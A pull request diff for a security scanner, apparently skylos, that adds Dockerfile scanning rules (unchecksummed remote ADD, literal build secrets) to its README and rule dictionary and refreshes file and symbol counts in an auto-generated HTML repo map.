### PR TITLE
fix(security): harden optional import and Dockerfile scanning

### DIFF
--- a/README.md
+++ b/README.md
@@ -211,6 +211,7 @@ and scanner scope.
 |:---|:---|:---|
 | GitHub Actions | `.github/workflows/*.yml`, `.github/workflows/*.yaml`, `action.yml`, `action.yaml` | dangerous triggers, token permissions, unpinned actions, template injection, secrets, OIDC, cache, and artifact policy |
 | GitLab CI | `.gitlab-ci.yml` | mutable images, unpinned includes, literal secrets, untrusted eval, Docker-in-Docker, OIDC, cache, timeout, and runner-tag policy |
+| Dockerfile | `Dockerfile`, `Dockerfile.*`, `*.dockerfile` | dangerous `RUN` commands, remote `ADD` without checksum, and literal build `ARG` / `ENV` secrets |
 | Edge Docker Compose | `compose*.yml`, `compose*.yaml`, `docker-compose*.yml`, `docker-compose*.yaml` | privileged containers, broad host device/control mounts, GPU/device runtime, and host networking |
 | Edge systemd | `*.service` | root edge services, mutable `ExecStart` paths, missing sandboxing, broad capabilities, and broad device access |
 

--- a/dictionary.md
+++ b/dictionary.md
@@ -172,6 +172,8 @@ Finding types:
 | D339 | HIGH | Persistent environment mutation | Shell, Python, TS/JS, GitHub Actions, GitLab CI, Dockerfile |
 | D340 | HIGH | Unapproved package or artifact publish | Shell, Python, TS/JS, GitHub Actions, GitLab CI, Dockerfile |
 | D341 | HIGH | Untrusted package-managed tool execution | Shell, Python, TS/JS, GitHub Actions, GitLab CI, Dockerfile |
+| D342 | HIGH | Dockerfile remote ADD without checksum | Dockerfile |
+| D343 | HIGH | Dockerfile literal secret build value | Dockerfile |
 
 ### Config And Deployment Security
 

--- a/docs/repo-map/index.html
+++ b/docs/repo-map/index.html
@@ -38,8 +38,8 @@
       <h2>Repo Snapshot</h2>
       <p class="lede">Use the route cards first. The folder and symbol sections are there when you need detail.</p>
       <div class="meta-grid">
-        <div class="metric"><strong>655</strong><span>Python files scanned</span></div>
-        <div class="metric"><strong>5480</strong><span>top-level classes/functions</span></div>
+        <div class="metric"><strong>667</strong><span>Python files scanned</span></div>
+        <div class="metric"><strong>5689</strong><span>top-level classes/functions</span></div>
         <div class="metric"><strong>32</strong><span>ownership areas</span></div>
         <div class="metric"><strong>12</strong><span>guided routes</span></div>
       </div>
@@ -655,7 +655,7 @@
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos" rel="noopener noreferrer">skylos</a></h3>
         <div class="stat-row">
           <span class="pill"><strong>files</strong> 6</span>
-          <span class="pill"><strong>symbols</strong> 250</span>
+          <span class="pill"><strong>symbols</strong> 258</span>
         </div>
       </div>
       <p>Root entrypoints and shared scan orchestration.</p>
@@ -683,11 +683,11 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">comment_out_unused_import_cst</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">comment_out_unused_function_cst</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">run_analyze</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">ConfigError</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">load_config</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">resolve_config_file_path</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">is_path_excluded</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">is_whitelisted</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">get_expired_whitelists</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">get_all_ignore_lines</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/analyzer.py" rel="noopener noreferrer">Skylos</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/analyzer.py" rel="noopener noreferrer">proc_file</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/analyzer.py" rel="noopener noreferrer">analyze</a> <span>def</span></li>
@@ -878,12 +878,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/audit deep-audit candidate selection, processing, redaction, export, and revalidation. use this for audit packets, changed-file audits, and post-scan review artifacts. skylos/audit/processor.py skylos/audit/candidates.py skylos/audit/revalidator.py test/test_audit_candidates.py test/test_audit_ci.py test/test_audit_cli.py test/test_audit_export.py test/test_audit_processor.py test/test_audit_revalidator.py skylos/audit/export.py skylos/audit/candidates.py skylos/audit/processor.py skylos/audit/types.py skylos/audit/revalidator.py skylos/audit/ci.py skylos/audit/polyglot.py skylos/audit/redaction.py">
+    <article class="folder-card searchable" data-search="skylos/audit deep-audit candidate selection, processing, redaction, export, and revalidation. use this for audit packets, changed-file audits, and post-scan review artifacts. skylos/audit/processor.py skylos/audit/candidates.py skylos/audit/revalidator.py test/test_audit_candidates.py test/test_audit_ci.py test/test_audit_cli.py test/test_audit_export.py test/test_audit_processor.py test/test_audit_revalidator.py skylos/audit/export.py skylos/audit/processor.py skylos/audit/candidates.py skylos/audit/types.py skylos/audit/revalidator.py skylos/audit/ci.py skylos/audit/polyglot.py skylos/audit/redaction.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit" rel="noopener noreferrer">skylos/audit</a></h3>
         <div class="stat-row">
           <span class="pill"><strong>files</strong> 10</span>
-          <span class="pill"><strong>symbols</strong> 96</span>
+          <span class="pill"><strong>symbols</strong> 107</span>
         </div>
       </div>
       <p>Deep-audit candidate selection, processing, redaction, export, and revalidation.</p>
@@ -898,8 +898,8 @@
       <div>
         <div class="mini-label">Important files</div>
         <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">skylos/audit/export.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">skylos/audit/candidates.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">skylos/audit/processor.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">skylos/audit/candidates.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/types.py" rel="noopener noreferrer">skylos/audit/types.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/revalidator.py" rel="noopener noreferrer">skylos/audit/revalidator.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/ci.py" rel="noopener noreferrer">skylos/audit/ci.py</a></li>
@@ -913,15 +913,15 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">write_deep_audit_export</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">_resolve_deep_audit_export_path</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/export.py" rel="noopener noreferrer">_normalized_allowed_files</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">scan_deep_audit_candidates</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_project_root</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_resolve_audit_file</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_discover_audit_files</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_is_audit_file</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">process_deep_audit_records</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_record_sort_key</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_normalized_allowed_files</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_is_active_record</a> <span>def</span></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_is_active_record</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/processor.py" rel="noopener noreferrer">_should_process_record</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">scan_deep_audit_candidates</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_project_root</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_resolve_audit_file</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/audit/candidates.py" rel="noopener noreferrer">_discover_audit_files</a> <span>def</span></li></ul>
       </div>
     </div>
       </details>
@@ -1159,12 +1159,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/core small shared core types and helpers used across scan paths. use this only for concepts that are truly shared across the product.   skylos/core/gatekeeper.py skylos/core/result_cache.py skylos/core/file_discovery.py skylos/core/grep_verify_common.py skylos/core/grep_verify.py skylos/core/grep_verify_language_strategies.py skylos/core/suite.py skylos/core/cli_shared.py">
+    <article class="folder-card searchable" data-search="skylos/core small shared core types and helpers used across scan paths. use this only for concepts that are truly shared across the product.   skylos/core/gatekeeper.py skylos/core/result_cache.py skylos/core/file_discovery.py skylos/core/grep_verify_common.py skylos/core/grep_verify.py skylos/core/grep_verify_language_strategies.py skylos/core/safe_cache_io.py skylos/core/suite.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core" rel="noopener noreferrer">skylos/core</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 17</span>
-          <span class="pill"><strong>symbols</strong> 146</span>
+          <span class="pill"><strong>files</strong> 18</span>
+          <span class="pill"><strong>symbols</strong> 155</span>
         </div>
       </div>
       <p>Small shared core types and helpers used across scan paths.</p>
@@ -1184,8 +1184,8 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/grep_verify_common.py" rel="noopener noreferrer">skylos/core/grep_verify_common.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/grep_verify.py" rel="noopener noreferrer">skylos/core/grep_verify.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/grep_verify_language_strategies.py" rel="noopener noreferrer">skylos/core/grep_verify_language_strategies.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/suite.py" rel="noopener noreferrer">skylos/core/suite.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/cli_shared.py" rel="noopener noreferrer">skylos/core/cli_shared.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">skylos/core/safe_cache_io.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/suite.py" rel="noopener noreferrer">skylos/core/suite.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
@@ -1480,12 +1480,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/llm llm security analysis, evidence grounding, provider runtime resolution, and prompt templates. treat this as high-risk: changes can reduce hallucinations or create scanner false negatives. skylos/llm/analyzer.py skylos/llm/finding_evidence.py skylos/llm/runtime.py test/test_cli_llm_provider.py test/test_litellm_adapter.py test/test_llm_analyzer.py test/test_llm_context.py test/test_llm_finding_evidence.py test/test_llm_graph.py skylos/llm/security_taskflow.py skylos/llm/verify_orchestrator.py skylos/llm/_grounding.py skylos/llm/finding_evidence.py skylos/llm/liveness.py skylos/llm/prompts.py skylos/llm/security_verifier.py skylos/llm/agents.py">
+    <article class="folder-card searchable" data-search="skylos/llm llm security analysis, evidence grounding, provider runtime resolution, and prompt templates. treat this as high-risk: changes can reduce hallucinations or create scanner false negatives. skylos/llm/analyzer.py skylos/llm/finding_evidence.py skylos/llm/runtime.py test/test_cli_llm_provider.py test/test_litellm_adapter.py test/test_llm_analyzer.py test/test_llm_context.py test/test_llm_finding_evidence.py test/test_llm_graph.py skylos/llm/security_taskflow.py skylos/llm/verify_orchestrator.py skylos/llm/_grounding.py skylos/llm/finding_evidence.py skylos/llm/threat_trace.py skylos/llm/liveness.py skylos/llm/prompts.py skylos/llm/security_verifier.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm" rel="noopener noreferrer">skylos/llm</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 28</span>
-          <span class="pill"><strong>symbols</strong> 346</span>
+          <span class="pill"><strong>files</strong> 29</span>
+          <span class="pill"><strong>symbols</strong> 373</span>
         </div>
       </div>
       <p>LLM security analysis, evidence grounding, provider runtime resolution, and prompt templates.</p>
@@ -1503,10 +1503,10 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/verify_orchestrator.py" rel="noopener noreferrer">skylos/llm/verify_orchestrator.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/_grounding.py" rel="noopener noreferrer">skylos/llm/_grounding.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/finding_evidence.py" rel="noopener noreferrer">skylos/llm/finding_evidence.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/threat_trace.py" rel="noopener noreferrer">skylos/llm/threat_trace.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/liveness.py" rel="noopener noreferrer">skylos/llm/liveness.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/prompts.py" rel="noopener noreferrer">skylos/llm/prompts.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/security_verifier.py" rel="noopener noreferrer">skylos/llm/security_verifier.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/agents.py" rel="noopener noreferrer">skylos/llm/agents.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/security_verifier.py" rel="noopener noreferrer">skylos/llm/security_verifier.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
@@ -1690,8 +1690,8 @@
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/rules" rel="noopener noreferrer">skylos/rules</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 70</span>
-          <span class="pill"><strong>symbols</strong> 553</span>
+          <span class="pill"><strong>files</strong> 72</span>
+          <span class="pill"><strong>symbols</strong> 578</span>
         </div>
       </div>
       <p>Rule catalog and concrete rule implementations for quality, security, config, edge, CI/CD, and SCA findings.</p>
@@ -1768,12 +1768,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/security security contract detection, secret handling, and security-specific analysis helpers. treat this as gate-sensitive; regressions here can hide vulnerabilities. skylos/security/ test/test_csharp_security.py test/test_dart_security.py test/test_edge_compose_security.py test/test_edge_systemd_security.py test/test_github_actions_security.py test/test_gitlab_ci_security.py skylos/security/contracts.py skylos/security/injection_scanner.py skylos/security/canonicalize.py skylos/security/__init__.py">
+    <article class="folder-card searchable" data-search="skylos/security security contract detection, secret handling, and security-specific analysis helpers. treat this as gate-sensitive; regressions here can hide vulnerabilities. skylos/security/ test/test_csharp_security.py test/test_dart_security.py test/test_dockerfile_security.py test/test_edge_compose_security.py test/test_edge_systemd_security.py test/test_github_actions_security.py skylos/security/command_guard_exfil.py skylos/security/contracts.py skylos/security/command_guard_policy.py skylos/security/command_guard_parse.py skylos/security/injection_scanner.py skylos/security/command_guard_paths.py skylos/security/canonicalize.py skylos/security/command_guard.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security" rel="noopener noreferrer">skylos/security</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 4</span>
-          <span class="pill"><strong>symbols</strong> 35</span>
+          <span class="pill"><strong>files</strong> 10</span>
+          <span class="pill"><strong>symbols</strong> 95</span>
         </div>
       </div>
       <p>Security contract detection, secret handling, and security-specific analysis helpers.</p>
@@ -1783,31 +1783,35 @@
         <div class="mini-label">Entrypoints</div>
         <div class="link-row"><a href="https://github.com/duriantaco/skylos/tree/main/skylos/security" rel="noopener noreferrer">skylos/security</a></div>
         <div class="mini-label">Nearby tests</div>
-        <div class="link-row"><a href="https://github.com/duriantaco/skylos/blob/main/test/test_csharp_security.py" rel="noopener noreferrer">test/test_csharp_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_dart_security.py" rel="noopener noreferrer">test/test_dart_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_compose_security.py" rel="noopener noreferrer">test/test_edge_compose_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_systemd_security.py" rel="noopener noreferrer">test/test_edge_systemd_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_github_actions_security.py" rel="noopener noreferrer">test/test_github_actions_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_gitlab_ci_security.py" rel="noopener noreferrer">test/test_gitlab_ci_security.py</a></div>
+        <div class="link-row"><a href="https://github.com/duriantaco/skylos/blob/main/test/test_csharp_security.py" rel="noopener noreferrer">test/test_csharp_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_dart_security.py" rel="noopener noreferrer">test/test_dart_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_dockerfile_security.py" rel="noopener noreferrer">test/test_dockerfile_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_compose_security.py" rel="noopener noreferrer">test/test_edge_compose_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_edge_systemd_security.py" rel="noopener noreferrer">test/test_edge_systemd_security.py</a> <a href="https://github.com/duriantaco/skylos/blob/main/test/test_github_actions_security.py" rel="noopener noreferrer">test/test_github_actions_security.py</a></div>
         <div class="split-list">
       <div>
         <div class="mini-label">Important files</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">skylos/security/contracts.py</a></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">skylos/security/command_guard_exfil.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">skylos/security/contracts.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">skylos/security/command_guard_policy.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_parse.py" rel="noopener noreferrer">skylos/security/command_guard_parse.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">skylos/security/injection_scanner.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_paths.py" rel="noopener noreferrer">skylos/security/command_guard_paths.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">skylos/security/canonicalize.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/__init__.py" rel="noopener noreferrer">skylos/security/__init__.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard.py" rel="noopener noreferrer">skylos/security/command_guard.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">SecurityContract</a> <span>class</span></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">command_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">pipeline_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">_pipeline_has_data_exfil</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">_pipeline_has_remote_script_execution</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_exfil.py" rel="noopener noreferrer">_is_sensitive_source</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">SecurityContract</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">RouteSnapshot</a> <span>class</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">load_security_contracts</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">resolve_diff_base_ref</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/contracts.py" rel="noopener noreferrer">detect_security_contract_regressions</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">scan_file</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">scan_directory</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">_extract_segments</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">_markdown_fence_marker</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/injection_scanner.py" rel="noopener noreferrer">_matched_fenced_block_lines</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">normalize</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">strip_zero_width</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">decode_base64_blobs</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/canonicalize.py" rel="noopener noreferrer">detect_homoglyphs</a> <span>def</span></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">token_policy_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">command_policy_risks</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">_is_package_registry_override</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/security/command_guard_policy.py" rel="noopener noreferrer">_is_sensitive_scope_access</a> <span>def</span></li></ul>
       </div>
     </div>
       </details>
@@ -1862,12 +1866,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="skylos/visitors ast/tree visitors that collect findings and semantic evidence. use this when a language-specific scan is missing or over-reporting code patterns. skylos/visitors/  skylos/visitors/languages/java/danger.py skylos/visitors/languages/typescript/analysis.py skylos/visitors/languages/typescript/danger.py skylos/visitors/languages/shell/danger.py skylos/visitors/languages/typescript/workspace.py skylos/visitors/languages/csharp/danger.py skylos/visitors/languages/typescript/resolve.py skylos/visitors/languages/csharp/core.py">
+    <article class="folder-card searchable" data-search="skylos/visitors ast/tree visitors that collect findings and semantic evidence. use this when a language-specific scan is missing or over-reporting code patterns. skylos/visitors/  skylos/visitors/languages/typescript/analysis.py skylos/visitors/languages/typescript/danger.py skylos/visitors/languages/java/danger.py skylos/visitors/languages/shell/danger.py skylos/visitors/languages/typescript/workspace.py skylos/visitors/languages/csharp/danger.py skylos/visitors/languages/typescript/resolve.py skylos/visitors/languages/csharp/core.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors" rel="noopener noreferrer">skylos/visitors</a></h3>
         <div class="stat-row">
           <span class="pill"><strong>files</strong> 39</span>
-          <span class="pill"><strong>symbols</strong> 336</span>
+          <span class="pill"><strong>symbols</strong> 342</span>
         </div>
       </div>
       <p>AST/tree visitors that collect findings and semantic evidence.</p>
@@ -1881,9 +1885,9 @@
         <div class="split-list">
       <div>
         <div class="mini-label">Important files</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">skylos/visitors/languages/java/danger.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/analysis.py</a></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/analysis.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/danger.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">skylos/visitors/languages/java/danger.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/shell/danger.py" rel="noopener noreferrer">skylos/visitors/languages/shell/danger.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/workspace.py" rel="noopener noreferrer">skylos/visitors/languages/typescript/workspace.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/csharp/danger.py" rel="noopener noreferrer">skylos/visitors/languages/csharp/danger.py</a></li>
@@ -1892,12 +1896,7 @@
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
-        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">scan_danger</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_shannon_entropy</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_query</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_run_batch</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">resolve_ts_module</a> <span>def</span></li>
+        <ul><li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">resolve_ts_module</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">build_ts_import_graph</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">demote_unconsumed_ts_exports</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/analysis.py" rel="noopener noreferrer">find_dead_ts_files</a> <span>def</span></li>
@@ -1905,7 +1904,12 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">scan_danger</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_shannon_entropy</a> <span>def</span></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_get_query</a> <span>def</span></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/typescript/danger.py" rel="noopener noreferrer">_is_sensitive_name</a> <span>def</span></li>
